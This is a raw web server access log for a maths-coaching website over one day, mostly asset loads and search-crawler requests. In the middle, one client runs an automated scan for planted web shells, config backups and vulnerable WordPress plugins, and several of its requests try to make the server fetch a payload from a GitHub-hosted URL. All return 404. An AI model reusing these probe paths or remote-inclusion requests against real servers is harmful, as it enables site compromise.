122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/fonts/fontawesome-webfont.woff2?v=4.5.0 HTTP/1.1" 200 66624 "https://bhaskarclasses.com/demo/assets/css/icons.min.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/icon-img/section-shape-3.png HTTP/1.1" 200 1024 "https://bhaskarclasses.com/demo/assets/css/style.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/course/course-11.jpg HTTP/1.1" 200 64515 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/course/course-8.jpg HTTP/1.1" 200 76653 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/course/course-12.jpg HTTP/1.1" 200 59825 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/banner/banner-2.jpg HTTP/1.1" 200 243505 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/icon-img/funfact-1.png HTTP/1.1" 200 3274 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/icon-img/funfact-2.png HTTP/1.1" 200 3074 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/gallery/gallery-1.png HTTP/1.1" 200 903 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/gallery/gallery-3.png HTTP/1.1" 200 903 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/gallery/gallery-2.png HTTP/1.1" 200 903 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/gallery/gallery-4.png HTTP/1.1" 200 903 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/slider/slider-2.jpg HTTP/1.1" 200 570062 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/icon-img/section-shape-4.png HTTP/1.1" 200 1024 "https://bhaskarclasses.com/demo/assets/css/style.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/bg/bg-4.jpg HTTP/1.1" 200 243409 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/bg/bg-5.jpg HTTP/1.1" 200 299422 "https://bhaskarclasses.com/demo/assets/css/style.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/bg/bg-6.jpg HTTP/1.1" 200 345311 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:45 +0000] "GET /demo/assets/img/favicon.png HTTP/1.1" 200 2903 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:03:44 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "https://bhaskarclasses.com/demo/assets/img/slider/slider-2.jpg" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
207.46.13.34 - - [02/Aug/2021:08:04:20 +0000] "GET /img/2.png HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
122.161.75.98 - - [02/Aug/2021:08:16:33 +0000] "GET /demo/assets/img/logo/logo.png HTTP/1.1" 304 - "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
207.46.13.17 - - [02/Aug/2021:09:17:37 +0000] "GET /best-ib-maths-coaching-in-kinauni-village-ghaziabad/ HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.131 - - [02/Aug/2021:09:19:44 +0000] "GET /google-captcha/img/loader.gif HTTP/1.1" 404 227 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.87 - - [02/Aug/2021:09:40:24 +0000] "GET /11th-class-maths-online-coaching-in-rohini-sector-17-new-delhi HTTP/1.1" 404 260 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.55.39.8 - - [02/Aug/2021:11:10:08 +0000] "GET /iit-jee-maths-online-coaching-in-sector-74-a-gurgaon/ HTTP/1.1" 404 251 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.74 - - [02/Aug/2021:11:18:56 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.17 - - [02/Aug/2021:11:47:31 +0000] "GET /best-ib-maths-coaching-in-kinauni-village-ghaziabad/ HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.60 - - [02/Aug/2021:12:06:41 +0000] "GET /12th-class-maths-online-coaching-in-henderson-perth HTTP/1.1" 404 249 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.29 - - [02/Aug/2021:12:27:33 +0000] "GET /12th-class-maths-online-coaching-in-the-spectacles-perth HTTP/1.1" 404 254 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.140.116 - - [02/Aug/2021:12:37:56 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
121.29.178.33 - - [02/Aug/2021:12:42:40 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko"
157.55.39.60 - - [02/Aug/2021:12:47:26 +0000] "GET /ib-maths-tutors-in-dwarka-sector-28-new-delhi HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
162.55.51.202 - - [02/Aug/2021:13:16:16 +0000] "GET /style.php HTTP/1.1" 404 207 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:19 +0000] "GET /moduless.php HTTP/1.1" 404 210 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:25 +0000] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 240 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:34 +0000] "GET /admin.php HTTP/1.1" 404 207 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:39 +0000] "GET /index.php?3x=3x HTTP/1.1" 404 207 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:41 +0000] "GET /boom.php?x HTTP/1.1" 404 206 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:46 +0000] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 233 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:50 +0000] "GET /wp-content/db_cache.php HTTP/1.1" 404 221 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:52 +0000] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 244 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:53 +0000] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 207 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:55 +0000] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 209 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:58 +0000] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 207 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:16:59 +0000] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 211 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:02 +0000] "GET /alfindex.php HTTP/1.1" 404 210 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:03 +0000] "GET /alfa.php HTTP/1.1" 404 206 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:05 +0000] "GET /wp-booking.php HTTP/1.1" 404 212 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:07 +0000] "GET /cindex.php HTTP/1.1" 404 208 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:09 +0000] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 225 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:15 +0000] "GET /wp-1ogin_bak.php HTTP/1.1" 404 214 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:17 +0000] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 223 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:18 +0000] "GET /wp-includes/css/css.php HTTP/1.1" 404 221 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:22 +0000] "GET /old-index.php HTTP/1.1" 404 211 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:24 +0000] "GET /config.bak.php HTTP/1.1" 404 212 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:26 +0000] "GET /wp-admin/config.bak.php HTTP/1.1" 404 221 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:28 +0000] "GET /wp-content/config.bak.php HTTP/1.1" 404 223 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:31 +0000] "GET /wp-includes/config.bak.php HTTP/1.1" 404 224 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:36 +0000] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 230 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:41 +0000] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 231 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:51 +0000] "POST /wp-includes/css/wp-config.php HTTP/1.1" 404 227 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:17:56 +0000] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 227 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:05 +0000] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 226 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:09 +0000] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 233 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:11 +0000] "GET /haders.php HTTP/1.1" 404 208 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:15 +0000] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 225 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:19 +0000] "GET /legion.php HTTP/1.1" 404 208 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:23 +0000] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 236 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:28 +0000] "GET /wp-includes/lfx.php HTTP/1.1" 404 217 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:33 +0000] "GET /wp-includes/small.php HTTP/1.1" 404 219 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:37 +0000] "GET /up.php HTTP/1.1" 404 204 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:38 +0000] "GET /upload.php HTTP/1.1" 404 208 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:45 +0000] "GET /config.php HTTP/1.1" 404 208 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:50 +0000] "GET /test.php?Ghost=send HTTP/1.1" 404 206 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:51 +0000] "GET /wp-content/langar.php HTTP/1.1" 404 219 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:52 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 248 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:56 +0000] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 268 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
162.55.51.202 - - [02/Aug/2021:13:18:59 +0000] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 404 254 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
207.46.13.17 - - [02/Aug/2021:13:49:34 +0000] "GET /12th-class-maths-online-coaching-in-alkimos-perth HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
114.119.136.51 - - [02/Aug/2021:14:30:05 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
54.36.148.180 - - [02/Aug/2021:14:30:40 +0000] "GET /11th-class-maths-online-coaching-in-qutabgarh-new-delhi HTTP/1.1" 404 253 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.55.39.60 - - [02/Aug/2021:14:58:17 +0000] "GET /12th-class-maths-online-coaching-in-henderson-perth HTTP/1.1" 404 249 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
35.226.151.121 - - [02/Aug/2021:15:11:05 +0000] "HEAD /wordpress HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.226.151.121 - - [02/Aug/2021:15:11:05 +0000] "HEAD / HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.226.151.121 - - [02/Aug/2021:15:11:05 +0000] "HEAD /wp HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.226.151.121 - - [02/Aug/2021:15:11:05 +0000] "HEAD /bc HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.226.151.121 - - [02/Aug/2021:15:11:05 +0000] "HEAD /bk HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.226.151.121 - - [02/Aug/2021:15:11:06 +0000] "HEAD /backup HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.226.151.121 - - [02/Aug/2021:15:11:06 +0000] "HEAD /old HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.226.151.121 - - [02/Aug/2021:15:11:06 +0000] "HEAD /new HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.226.151.121 - - [02/Aug/2021:15:11:06 +0000] "HEAD /main HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.226.151.121 - - [02/Aug/2021:15:11:07 +0000] "HEAD /home HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
157.55.39.8 - - [02/Aug/2021:15:16:01 +0000] "GET /best-ib-maths-coaching-in-bahapur-new-delhi HTTP/1.1" 404 241 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.211 - - [02/Aug/2021:15:36:15 +0000] "GET /11th-class-maths-online-coaching-in-rohini-sector-14-new-delhi HTTP/1.1" 404 260 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.55.39.8 - - [02/Aug/2021:15:37:56 +0000] "GET /12th-class-maths-online-coaching-in-sector-128-noida/ HTTP/1.1" 404 251 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.79 - - [02/Aug/2021:15:52:35 +0000] "GET /btech-maths-coaching-in-payson-utah-usa HTTP/1.1" 404 237 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.17 - - [02/Aug/2021:16:05:17 +0000] "GET /best-iit-jee-maths-coaching-in-bhondsi-gurgaon/ HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.74 - - [02/Aug/2021:16:19:04 +0000] "GET /best-ib-maths-coaching-in-vasundhara-enclave-new-delhi HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.63 - - [02/Aug/2021:16:38:30 +0000] "GET /11th-class-maths-online-coaching-in-keshavpuram-new-delhi HTTP/1.1" 404 255 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
207.46.13.8 - - [02/Aug/2021:16:55:42 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.34 - - [02/Aug/2021:16:55:51 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.1 - - [02/Aug/2021:17:16:29 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.1 - - [02/Aug/2021:17:16:31 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.0 - - [02/Aug/2021:17:16:43 +0000] "GET /best-12th-class-maths-coaching-in-ramesh-nagar-new-delhi/ HTTP/1.1" 404 255 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.8 - - [02/Aug/2021:17:22:36 +0000] "GET /ib-maths-online-coaching-in-sector-59-gurgaon/ HTTP/1.1" 404 244 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.29 - - [02/Aug/2021:17:30:10 +0000] "GET /best-ib-maths-coaching-in-sector-133-noida/ HTTP/1.1" 404 241 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
